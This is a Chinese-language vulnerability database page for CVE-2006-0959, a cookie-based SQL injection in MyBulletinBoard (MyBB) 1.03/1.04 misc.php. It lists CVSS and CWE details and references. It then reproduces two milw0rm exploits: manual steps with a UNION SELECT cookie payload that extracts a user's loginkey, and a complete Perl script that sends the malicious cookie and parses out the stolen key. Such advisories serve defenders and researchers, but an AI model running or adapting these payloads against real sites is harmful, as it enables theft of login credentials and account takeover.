CVE-2006-0959
CVSS7.5
发布时间 :2006-03-02 18:02:00
修订时间 :2011-08-05 00:00:00
NMCOE    

[原文]SQL injection vulnerability in misc.php in MyBulletinBoard (MyBB) 1.03, when register_globals is enabled, allows remote attackers to execute arbitrary SQL commands by setting the comma variable value via the comma parameter in a cookie. NOTE: 1.04 has also been reported to be affected.


[CNNVD]MyBulletinBoard 'misc.php' SQL注入漏洞(CNNVD-200603-004)

        在MyBulletinBoard (MyBB) 1.03版本的misc.php中存在SQL注入漏洞, 当register_globals被激活时,会使远程攻击者通过在一个cookie中的comma参数中设置comma变量值,执行任意SQL命令。 注意:1.04版本也报告过受到影响。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-89 [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)]

- CPE (受影响的平台与产品)

cpe:/a:mybulletinboard:mybulletinboard:1.0.3
cpe:/a:mybulletinboard:mybulletinboard:1.0.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0959
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0959
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-004
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/24953
(UNKNOWN)  XF  mybb-misc-sql-injection(24953)
http://www.vupen.com/english/advisories/2006/0774
(VENDOR_ADVISORY)  VUPEN  ADV-2006-0774
http://www.securityfocus.com/bid/16631
(UNKNOWN)  BID  16631
http://www.securityfocus.com/archive/1/archive/1/426653/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060303 MyBB 1.04 Perl Exploit
http://www.securityfocus.com/archive/1/archive/1/426320/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060228 MyBB 1.3 NewSQL Injection
http://www.osvdb.org/23554
(UNKNOWN)  OSVDB  23554
http://securityreason.com/securityalert/512
(UNKNOWN)  SREASON  512
http://secunia.com/advisories/19061
(VENDOR_ADVISORY)  SECUNIA  19061
http://milw0rm.com/exploits/1539
(UNKNOWN)  MILW0RM  1539

- 漏洞信息

MyBulletinBoard 'misc.php' SQL注入漏洞
高危 SQL注入
2006-03-02 00:00:00 2006-10-05 00:00:00
远程  
        在MyBulletinBoard (MyBB) 1.03版本的misc.php中存在SQL注入漏洞, 当register_globals被激活时,会使远程攻击者通过在一个cookie中的comma参数中设置comma变量值,执行任意SQL命令。 注意:1.04版本也报告过受到影响。

- 公告与补丁

        目前厂商还没有提供此漏洞的相关补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本.

- 漏洞信息 (1539)

MyBulletinBoard (MyBB) <= 1.03 (misc.php COMMA) SQL Injection (EDBID:1539)
php webapps
2006-02-28 Verified
0 Devil-00
N/A [点击下载]
MyBB New SQL Injection

D3vil-0x1 < Devil-00 >

Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320

The Inf.File :-
misc.php

Linez :-

[code]
	$buddies = $mybb->user['buddylist'];

	$namesarray = explode(",",$buddies);

	if(is_array($namesarray))

	{

		while(list($key, $buddyid) = each($namesarray))

		{

			$sql .= "$comma'$buddyid'"; <== HERE :) Uncleard Var !!

			$comma = ",";

		}

	$timecut = time() - $mybb->settings['wolcutoff'];

	$query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");
[/code]

From 255 to 265

The GLOBALS unset function .. do not unset $_COOKIES ..
then u can start attacking any var by cookies :)

Tested MyBB 1.3 .. Register_Globals = On

Explorer Exploit :-

1- Login by any username ..
2- Create new cookie (
	name 	=> "comma"
	value	=> "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=1/*")

3- Check The URL :-
HOST/PATH/misc.php?action=buddypopup

Where HOST = The Vic.Server And PATH = MyBB Dir.

# milw0rm.com [2006-02-28]
		

- 漏洞信息 (1548)

MyBulletinBoard (MyBB) <= 1.04 (misc.php COMMA) SQL Injection (2) (EDBID:1548)
php webapps
2006-03-03 Verified
0 Devil-00
N/A [点击下载]
#!/usr/bin/perl -w

# MyBB <= 1.04 (misc.php COMMA) Remote SQL Injection Exploit 2 , Perl C0d3
#
# Milw0rm ID :-
#			http://www.milw0rm.com/auth.php?id=1539
# D3vil-0x1 | Devil-00 < BlackHat > :)
#
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
use IO::Socket;

##-- Start --#

$host 	= "127.0.0.1";
$path		= "/mybb3/";
$userid	= 1;
$mycookie 	= "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";

##-- _END_ --##
#	$host		:-
#				The Host Name Without http:// | exm. www.vic.com
#
#	$path		:-
#				MyBB Dir On Server | exm. /mybb/
#
#	$userid	:-
#				The ID Of The User U Wanna To Get His Loginkey
#
#	$cookie	:-
#				You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
#	
#				$cookie 	= "mybbuser=[YourID]_[YourLoginkey];";
$sock = IO::Socket::INET->new (
										PeerAddr => "$host",
										PeerPort	=> "80",
										Proto		=> "tcp"
										) or die("[!] Connect To Server Was Filed");
##-- DONT TRY TO EDIT ME --##										
$evilcookie = "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=$userid/*;";
##-- DONT TRY TO EDIT ME --##						
$evildata  = "GET ".$path."misc.php?action=buddypopup HTTP/1.1\n";
$evildata .= "Host: $host \n";
$evildata .= "Accept: */* \n";
$evildata .= "Keep-Alive: 300\n";
$evildata .= "Connection: keep-alive \n";
$evildata .= "Cookie: ".$mycookie." ".$evilcookie."\n\n";

print $sock $evildata;

while($ans = <$sock>){
	$ans =~ m/<a href=\"member.php\?action=profile&amp;uid=1\" target=\"_blank\">(.*?)<\/a><\/span><\/td>/ && print "[+] Loginkey is :- ".$1."\n";
}

# milw0rm.com [2006-03-03]
		

- 漏洞信息

23554
MyBulletinBoard (MyBB) Cookie comma Value SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-02-28 Unknow
2006-02-28 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站